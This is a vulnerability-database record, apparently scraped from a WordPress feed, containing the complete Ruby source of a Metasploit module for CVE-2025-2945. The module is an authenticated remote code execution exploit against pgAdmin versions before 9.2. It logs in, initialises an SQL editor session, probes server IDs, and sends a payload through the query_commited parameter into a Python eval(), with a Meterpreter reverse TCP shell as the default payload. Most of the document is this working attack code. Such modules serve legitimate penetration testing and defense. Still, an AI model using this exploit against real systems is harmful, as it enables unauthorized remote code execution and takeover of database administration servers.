{“lastseen”:”2025-08-29T19:21:14″,”description”:”This module exploits a vulnerability in pgAdmin where an authenticated user can establish a connection to the query tool …”,”published”:”2025-08-29T18:53:41″,”modified”:”2025-04-11T18:54:17″,”type”:”metasploit”,”title”:”pgAdmin Query Tool authenticated RCE (CVE-2025-2945)”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-PGADMIN_QUERY_TOOL_AUTHENTICATED-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-2945″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::PgAdmin\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘pgAdmin Query Tool authenticated RCE (CVE-2025-2945)’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a vulnerability in pgAdmin where an authenticated user can establish a connection to the query tool\\n and send a specific payload in the query_commited POST parameter. This payload is directly executed via a Python eval()\\n statement, resulting in remote code execution in versions prior to 9.2.\\n\\n To exploit this vulnerability, pgAdmin credentials are required. Additionally, in order to interact with the vulnerable\\n SQL editor component, valid database credentials are necessary to initialize a session and obtain a transaction ID,\\n which is required for the exploit.\\n },\\n ‘Author’ =\\u003e [\\n ‘pyozzi-toss’, # Vulnerability discovery\\n ‘jheysel-r7’ # msf module\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-2945’],\\n ],\\n ‘Platform’ =\\u003e [‘python’],\\n ‘Arch’ =\\u003e [ ARCH_PYTHON],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Python payload’,\\n {\\n ‘Platform’ =\\u003e ‘python’,\\n ‘Arch’ =\\u003e ARCH_PYTHON,\\n ‘DefaultOptions’ =\\u003e { ‘PAYLOAD’ =\\u003e ‘python\/meterpreter\/reverse_tcp’ }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2025-04-03’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n Opt::RPORT(80),\\n OptString.new(‘USERNAME’, [true, ‘The username to authenticate to pgadmin with’, ”]),\\n OptString.new(‘PASSWORD’, [true, ‘The password to authenticate to pgadmin with’, ”]),\\n OptString.new(‘DB_USER’, [true, ‘The username to authenticate to the database with’, ”]),\\n OptString.new(‘DB_PASS’, [true, ‘The password to authenticate to the database with’, ”]),\\n OptString.new(‘DB_NAME’, [true, ‘The database to authenticate to’, ”]),\\n OptInt.new(‘MAX_SERVER_ID’, [true, ‘The maximum number of Server IDs to try and connect to.’, 10]),\\n ]\\n )\\n end\\n\\n def check\\n # Although there is no low bound mentioned in the advisory, we can see that the vulnerable eval() statement was\\n # introduced in version 8.10: https:\/\/github.com\/pgadmin-org\/pgadmin4\/commit\/22cdb86aab5825787a36d149f8e6eb34fb26d817\\n check_version(‘9.2’, ‘8.10’)\\n end\\n\\n # Return only the required URI encoded fields in order for the POST request to be successful\\n # @return [String] The URI encoded form data for the POST request\\n def get_post_data\\n URI.encode_www_form({\\n ‘title’ =\\u003e Faker::App.name.downcase,\\n ‘selectedNodeInfo’ =\\u003e {\\n ‘database’ =\\u003e {\\n ‘id’ =\\u003e Faker::App.name.downcase\\n }\\n }\\n })\\n end\\n\\n def post_initialize_sqleditor(trans_id, sgid, sid, did)\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, \\”\/sqleditor\/initialize\/sqleditor\/#{trans_id}\/#{sgid}\/#{sid}\/#{did}\\”),\\n ‘method’ =\\u003e ‘POST’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘headers’ =\\u003e { ‘X-pgA-CSRFToken’ =\\u003e csrf_token },\\n ‘data’ =\\u003e {\\n ‘user’ =\\u003e datastore[‘DB_USER’],\\n ‘password’ =\\u003e datastore[‘DB_PASS’],\\n ‘role’ =\\u003e ”,\\n ‘dbname’ =\\u003e datastore[‘DB_NAME’]\\n }.to_json\\n })\\n\\n unless res\\u0026.code == 200\\n errmsg = res\\u0026.get_json_document\\u0026.dig(‘result’, ‘errmsg’) || ‘unknown error’\\n fail_with(Failure::UnexpectedReply, \\”Failed to initialize sqleditor: #{errmsg}\\”)\\n end\\n\\n print_good(‘Successfully initialized sqleditor’)\\n end\\n\\n def find_valid_server_id(sgid)\\n (1..datastore[‘MAX_SERVER_ID’]).each do |sid|\\n vprint_status(\\”Trying server ID: #{sid}\\”)\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, \\”\/sqleditor\/get_server_connection\/#{sgid}\/#{sid}\\”),\\n ‘method’ =\\u003e ‘GET’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’,\\n ‘headers’ =\\u003e {\\n ‘X-pgA-CSRFToken’ =\\u003e csrf_token\\n }\\n })\\n if res\\u0026.get_json_document\\u0026.dig(‘data’, ‘status’)\\n return sid\\n end\\n end\\n fail_with(Failure::NoTarget, ‘Failed to find a valid server ID, try increasing MAX_SERVER_ID’)\\n end\\n\\n # In order to interact with the vulnerable component, the SQL editor, we need to initialize a session and a valid\\n # transaction ID. This is done by sending a POST request to the sqleditor\/panel endpoint with the necessary parameters\\n # @return [String] The transaction ID for the SQL editor\\n def sqleditor_init(trans_id)\\n sgid = rand(1..10)\\n did = rand(10000..99999)\\n sid = find_valid_server_id(sgid)\\n post_initialize_sqleditor(trans_id, sgid, sid, did)\\n end\\n\\n def exploit\\n authenticate(datastore[‘USERNAME’], datastore[‘PASSWORD’])\\n trans_id = rand(1_000_000..9_999_999)\\n sqleditor_init(trans_id)\\n\\n print_status(‘Exploiting the target…’)\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, \\”\/sqleditor\/query_tool\/download\/#{trans_id}\\”),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘headers’ =\\u003e {\\n ‘Referer’ =\\u003e \\”http:\/\/#{datastore[‘RHOST’]}:#{datastore[‘RPORT’]}\/sqleditor\/panel\/#{trans_id}?is_query_tool=true\\”,\\n ‘X-Pga-Csrftoken’ =\\u003e csrf_token\\n },\\n ‘data’ =\\u003e {\\n ‘query_commited’ =\\u003e payload.encoded\\n }.to_json\\n })\\n print_error(‘No response received from exploit attempt’) unless res\\n print_good(‘Received a 500 response from the exploit attempt, this is expected’) if res\\u0026.code == 500\\n print_error(\\”Received an unexpected response code from the exploit attempt: #{res\\u0026.code}\\”) if res\\u0026.code != 500\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/pgadmin_query_tool_authenticated.rb”,”cvss”:{“score”:9.9,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/pgadmin_query_tool_authenticated\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-29T19:21:14″,”description”:”This module exploits a vulnerability in pgAdmin where an authenticated user can establish a connection to the query tool …”,”published”:”2025-08-29T18:53:41″,”modified”:”2025-04-11T18:54:17″,”type”:”metasploit”,”title”:”pgAdmin Query Tool authenticated RCE (CVE-2025-2945)”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-PGADMIN_QUERY_TOOL_AUTHENTICATED-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-2945″],”sourceData”:”##\\n#…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,45,12,169,13,7,11,5],"class_list":["post-15130","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-99","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n